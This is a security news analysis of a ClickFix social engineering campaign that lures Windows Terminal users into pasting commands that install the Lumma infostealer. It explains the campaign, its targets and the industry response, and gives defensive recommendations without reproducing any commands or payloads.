⚡ Quick Summary
- A new ClickFix social engineering variant tricks users into opening Windows Terminal and pasting malicious commands that deploy the Lumma credential-stealing infostealer.
- Lumma Stealer, a commercially available malware-as-a-service tool active since 2022, targets browser-stored passwords, session cookies, and crypto wallet data.
- The attack bypasses automated endpoint defences entirely because the malicious action is performed voluntarily by a trusted human user rather than an automated process.
- Developers, IT administrators, and DevOps engineers are the primary targets, as their elevated credentials carry the highest enterprise compromise potential.
- The infostealer market grew 72% year-over-year in 2023, with over 343 million credentials compromised — underscoring the scale of the commercial cybercrime ecosystem enabling these campaigns.
What Happened
Microsoft's security research teams have identified a sophisticated new variant of the long-running ClickFix social engineering campaign, one that represents a meaningful escalation in attacker methodology. Unlike earlier iterations of this scam, which typically directed victims toward downloading and executing malicious payloads through conventional browser-based delivery mechanisms, this latest wave leverages Windows Terminal — Microsoft's modern, GPU-accelerated command-line environment — as the attack vector of choice.
The mechanics are deceptively straightforward. Victims encounter what appears to be a routine error message or verification prompt on a compromised or fraudulent website. The page instructs them to open Windows Terminal (the consolidated shell environment that ships with Windows 11 and is available as a download for Windows 10 users), then paste a command string that the site has helpfully pre-loaded to their clipboard. The user, believing they are completing a legitimate troubleshooting or verification step, executes the command themselves — effectively bypassing virtually every automated endpoint defence in the process.
The payload being delivered through this mechanism is Lumma Stealer, a credential-harvesting malware-as-a-service (MaaS) tool that has been commercially available on Russian-language cybercrime forums since approximately 2022. Lumma is specifically engineered to exfiltrate browser-stored credentials, session cookies, cryptocurrency wallet data, and authentication tokens — the precise assets that give attackers persistent, monetisable access to corporate and personal accounts alike.
What makes this variant particularly alarming is the target selection. Windows Terminal is not a tool that casual home users typically open on a Tuesday afternoon. Its presence on a machine generally signals a developer, IT administrator, DevOps engineer, or power user — exactly the class of employee whose credentials carry the highest privilege escalation potential within an enterprise environment. Microsoft's security disclosure stops short of attributing the campaign to a specific threat actor group, but the sophistication of the targeting suggests organised, financially motivated cybercriminal infrastructure rather than opportunistic script-kiddies.
Background and Context
To understand why ClickFix has proven so durable and why this Terminal-based evolution is so significant, it helps to trace the technique's lineage. The original ClickFix pattern — sometimes called "paste and run" or "self-pwn" social engineering — first gained widespread attention in late 2023 and accelerated sharply through 2024. Early variants typically impersonated CAPTCHA services, Google reCAPTCHA prompts, or browser update notifications. The user would be instructed to press Win+R to open the Run dialog, then paste a PowerShell command that would silently download and execute a dropper.
The genius of the technique, from an attacker's perspective, is that it routes around the entire automated threat detection stack. Antivirus engines, email gateways, and browser sandboxes are all designed to intercept files being written to disk or processes being spawned by browser child processes. When a human being manually opens a shell and types or pastes a command, the operating system has no reliable mechanism to distinguish that action from legitimate administrative activity. It is, in security parlance, a "living off the land" technique elevated to an art form.
Lumma Stealer itself has an instructive history. First advertised on underground forums under the name "LummaC2" in mid-2022, it rapidly became one of the most commercially successful infostealer platforms in the cybercriminal ecosystem. Security researchers at Mandiant, Recorded Future, and ESET have all published analyses documenting Lumma's modular architecture, its use of dead-drop resolvers to evade C2 detection, and its subscription-based pricing model — reportedly ranging from $250 to $1,000 per month depending on feature tier. By 2024, Lumma had been implicated in breaches affecting financial services firms, healthcare providers, and technology companies across North America and Europe.
Windows Terminal, meanwhile, was first released as a preview in May 2019 and reached version 1.0 in May 2020. Microsoft positioned it as the modern replacement for the aging Command Prompt and the fragmented PowerShell experience. By Windows 11, Terminal became the default shell environment. Its adoption among developers and IT professionals has been near-universal, making it an attractive and high-value target surface for any attacker willing to invest in social engineering rather than technical exploits.
The pivot to Terminal specifically — rather than the older Run dialog approach — also reflects attackers adapting to Microsoft's own security improvements. Windows 11's enhanced Smart App Control and the tightening of macro execution policies in Microsoft 365 have closed several previously reliable delivery channels, pushing threat actors toward this more manual, socially-engineered approach.
Why This Matters
The implications of this campaign extend well beyond the immediate threat of credential theft, significant as that is. This attack pattern represents a fundamental challenge to the security model that most enterprise organisations have spent the last decade building.
Modern enterprise security architecture is predicated on a layered defence model: perimeter controls, endpoint detection and response (EDR) platforms, email filtering, browser isolation, and user behaviour analytics all working in concert. The ClickFix Terminal variant sidesteps every single one of these layers simultaneously. There is no malicious attachment to scan, no suspicious download to flag, no anomalous process spawn to detect — just a privileged user doing exactly what privileged users do, running commands in a terminal.
For IT professionals managing Windows environments, this creates a genuinely difficult policy problem. Blocking Windows Terminal access for all users would cripple developer productivity and hamper legitimate administrative workflows. Implementing application control policies granular enough to allow Terminal but block specific command patterns is technically feasible but operationally complex, and sophisticated attackers can trivially obfuscate their payloads to evade signature-based command-line monitoring.
The credential theft angle deserves particular attention. Lumma Stealer's primary targets — browser-stored passwords, session cookies, and authentication tokens — are the foundation of modern identity-based access. In an era when most enterprise applications are SaaS-delivered and authentication is brokered through identity providers like Microsoft Entra ID (formerly Azure AD) or Okta, a stolen session token can grant an attacker access to an entire application portfolio without triggering MFA challenges. This is not theoretical: the 2023 MGM Resorts breach and the Caesars Entertainment compromise both involved session token theft as a critical enabler.
For organisations running genuine Windows 11 environments, ensuring that systems are fully patched and that Microsoft Defender for Endpoint's attack surface reduction (ASR) rules are properly configured is an immediate priority. Specifically, ASR rules targeting the blocking of process creations originating from PSExec and WMI commands, and rules restricting credential stealing from the Windows local security authority subsystem, should be reviewed and enforced in block mode rather than audit mode.
The human element is, as always, the hardest to patch. Security awareness training that specifically addresses the "paste and run" social engineering pattern needs to be updated to include Terminal-based scenarios, not just the older Run dialog variants that most training curricula currently cover.
Industry Impact and Competitive Landscape
While this specific campaign targets Windows Terminal, the broader ClickFix technique is platform-agnostic in principle, and the security industry's response to it will shape defensive tooling across the ecosystem.
Microsoft is in an awkward position here. Windows Terminal is a product the company actively promotes as a developer productivity tool, and its tight integration with PowerShell, WSL2, and Azure CLI makes it central to the Microsoft developer experience. Any heavy-handed response — such as adding friction to Terminal launch or implementing aggressive command-line scanning — risks alienating the developer community that Microsoft has worked hard to win back over the past decade. The company's GitHub Copilot CLI integration, which suggests and executes terminal commands via AI assistance, makes this tension even more acute: Microsoft is simultaneously making Terminal more powerful and more central to workflows while attackers are exploiting that centrality.
Google faces a structurally similar challenge with its Cloud Shell environment, and Apple's Terminal application on macOS has been targeted by analogous campaigns, though the smaller enterprise footprint of macOS in traditional corporate environments limits the blast radius. The real competitive dimension here is in the security vendor space.
CrowdStrike, SentinelOne, and Microsoft's own Defender for Endpoint are all racing to develop behavioural detection capabilities that can identify malicious command-line activity without generating unacceptable false positive rates. CrowdStrike's Falcon platform has invested heavily in its "Indicators of Attack" (IoA) framework, which attempts to detect attacker intent from behavioural patterns rather than signatures — a methodology well-suited to catching ClickFix-style attacks. SentinelOne's Singularity platform similarly emphasises autonomous behavioural AI. Microsoft's Defender for Endpoint, which ships with Microsoft 365 E5 licensing, has the advantage of deep OS integration but has historically lagged third-party EDR vendors in detection velocity for novel social engineering campaigns.
The MaaS economy underpinning Lumma Stealer is itself a significant market dynamic. The commercialisation of infostealer tooling has dramatically lowered the barrier to entry for credential theft campaigns. Threat actors who lack the technical sophistication to develop their own malware can simply subscribe to Lumma's affiliate program, pay a monthly fee, and access a polished, regularly updated tool with customer support. This has contributed to a measurable increase in infostealer-related incidents: according to SpyCloud's 2024 Annual Identity Exposure Report, infostealer malware was responsible for the compromise of over 343 million credentials in 2023 alone — a 72% year-over-year increase.
For enterprise productivity software vendors broadly, this trend underscores why identity security and credential management have become the central battleground in enterprise cybersecurity, displacing the network perimeter as the primary defensive focus.
Expert Perspective
From a strategic security standpoint, what this campaign illustrates most clearly is the maturation of the social engineering threat landscape. Attackers have effectively completed a full circle: having found that technical exploits are increasingly expensive to develop and short-lived against patched systems, they have returned to the oldest technique in the playbook — convincing a trusted human to do the work for them — but wrapped in a technically sophisticated delivery mechanism that defeats modern automated defences.
The choice of Windows Terminal as the delivery vehicle is analytically significant. It signals that threat actors are conducting genuine reconnaissance into their target demographics. Terminal users are not random victims; they are selected because their credentials are more valuable. A developer's GitHub token, an IT admin's Azure service principal credentials, or a DevOps engineer's Kubernetes cluster access are orders of magnitude more damaging when compromised than a standard end-user's email password.
Industry analysts would note that this campaign also has implications for Microsoft's Copilot+ PC initiative and the broader push toward AI-assisted computing. As AI assistants increasingly suggest and execute terminal commands on behalf of users, the cognitive boundary between "a command I typed" and "a command I was told to type" becomes blurrier. Attackers will inevitably attempt to exploit this ambiguity, potentially crafting social engineering lures that mimic AI assistant interfaces to further lower user suspicion.
The forward-looking concern is prompt injection and AI-mediated command execution — a threat vector that is still nascent but growing rapidly as agentic AI systems gain enterprise adoption. The ClickFix Terminal campaign may, in retrospect, be seen as an early harbinger of that more complex threat landscape.
What This Means for Businesses
For business decision-makers and IT leaders, this campaign demands immediate but measured action across several fronts.
First, security awareness training programmes should be updated within the next 30 days to include specific scenarios involving Terminal-based social engineering. Employees with administrative or developer access — the highest-risk cohort — should receive targeted briefings. The message is simple: no legitimate service, verification system, or troubleshooting guide will ever ask you to open a terminal and paste a command from a website.
Second, IT teams should audit their Microsoft Defender for Endpoint ASR rule configurations. Many organisations deploy ASR rules in audit mode indefinitely, generating telemetry without actually blocking malicious activity. Rules specifically relevant to this threat vector should be moved to enforcement mode after appropriate testing.
Third, privileged access workstations (PAWs) — dedicated, hardened machines used exclusively for administrative tasks — should have web browsing restricted or eliminated entirely. An admin who cannot browse arbitrary websites on their administrative workstation cannot be lured to a ClickFix page on that machine.
Fourth, organisations should review their browser credential storage policies. Storing passwords in browser vaults is convenient but creates a concentrated, high-value target for infostealers. Enterprise password managers with hardware-backed credential storage offer meaningfully better security posture.
On the licensing front, organisations looking to maximise their security tooling investment should ensure they are fully utilising the security capabilities included in their existing Microsoft 365 subscriptions before purchasing additional point solutions. Businesses can also reduce overhead costs by sourcing an affordable Microsoft Office licence through legitimate resellers, freeing budget for security tooling investments.
Key Takeaways
- A new ClickFix variant targets Windows Terminal users, tricking them into pasting malicious commands that deliver the Lumma infostealer — bypassing automated endpoint defences entirely through social engineering.
- Lumma Stealer is a commercially available MaaS tool that specifically harvests browser credentials, session cookies, and authentication tokens, enabling persistent, privilege-escalated access to enterprise SaaS environments.
- The attack is particularly dangerous for developers and IT administrators, whose Terminal access and elevated privileges make their credentials disproportionately valuable to attackers.
- Traditional endpoint security tools are largely ineffective against this technique because the malicious action is performed by a legitimate, trusted user rather than an automated process or downloaded file.
- Microsoft's Attack Surface Reduction rules in Defender for Endpoint offer partial mitigation, but must be configured in enforcement mode — many organisations leave them in audit-only mode, providing telemetry but no protection.
- The infostealer market grew 72% year-over-year in 2023, driven by the commercialisation of MaaS platforms like Lumma, dramatically lowering the barrier to entry for credential theft campaigns.
- Security awareness training must be updated immediately to address Terminal-based social engineering scenarios, as most current curricula focus on the older Run dialog variant of ClickFix.
Looking Ahead
Several developments in the coming months will determine how this threat evolves and how effectively the industry responds.
Microsoft is expected to continue expanding Defender for Endpoint's behavioural detection capabilities, and the company's Security Copilot platform — its AI-powered security operations tool — may eventually be able to correlate clipboard activity with suspicious web browsing patterns to flag ClickFix-style attacks before execution. Watch for updates to Microsoft's ASR rule documentation and any changes to Windows Terminal's default security posture in upcoming Windows 11 cumulative updates.
The broader ClickFix technique will almost certainly continue to evolve. Expect attackers to experiment with lures that mimic AI assistant interfaces, IDE error messages, and cloud platform notifications — all high-credibility contexts for a developer or IT professional. The integration of Windows Terminal with GitHub Copilot CLI and Azure Developer CLI creates new impersonation opportunities that threat actors will not ignore.
Law enforcement actions against Lumma Stealer's infrastructure — similar to the 2024 disruption of the Redline and META infostealer operations by Europol and the FBI — remain possible but have historically produced only temporary disruptions to MaaS ecosystems. The underlying criminal infrastructure tends to reconstitute quickly. The most durable defence will be organisational and procedural, not technological.
Frequently Asked Questions
What is the ClickFix attack and how does the Windows Terminal variant work?
ClickFix is a social engineering technique where victims are shown a fake error message or verification prompt on a malicious or compromised website. The page instructs them to open a specific system tool — in this latest variant, Windows Terminal — and paste a command that the site has pre-loaded to their clipboard. Because the user performs the action themselves, it bypasses automated security tools that monitor for malicious file downloads or suspicious process spawning. The pasted command then silently installs the Lumma infostealer, which proceeds to harvest credentials from the browser and system.
Why is Lumma Stealer particularly dangerous for enterprise environments?
Lumma Stealer is specifically engineered to extract browser-stored passwords, active session cookies, and authentication tokens — the credentials that grant access to cloud applications and SaaS platforms. In modern enterprises where most applications are accessed through identity providers like Microsoft Entra ID or Okta, a stolen session token can allow an attacker to bypass multi-factor authentication entirely and access an entire application portfolio. Lumma also targets cryptocurrency wallets and stored form data, making it highly monetisable. Its commercial MaaS model means it is regularly updated by its developers to evade detection.
What can IT departments do right now to protect against this threat?
IT teams should take several immediate steps: update security awareness training to include Terminal-based social engineering scenarios; audit Microsoft Defender for Endpoint ASR (Attack Surface Reduction) rules and move relevant rules from audit mode to enforcement mode; restrict web browsing on privileged access workstations used for administrative tasks; review browser credential storage policies and consider migrating to hardware-backed enterprise password managers; and ensure Windows 11 systems are fully patched with the latest cumulative updates. Organisations should also review their identity provider configurations to ensure session token lifetimes are appropriately limited.
Does this attack affect Windows 10 users or only Windows 11?
Windows Terminal is the default shell environment in Windows 11, but it is also available as a free download from the Microsoft Store for Windows 10 users, and it ships pre-installed on many Windows 10 developer and enterprise builds. Any user who has Windows Terminal installed — regardless of whether they are on Windows 10 or Windows 11 — is potentially susceptible to this social engineering attack. The attack relies on the user's willingness to follow instructions, not on any specific OS vulnerability, so the version of Windows matters less than whether the user has Terminal installed and whether they can be convinced to use it.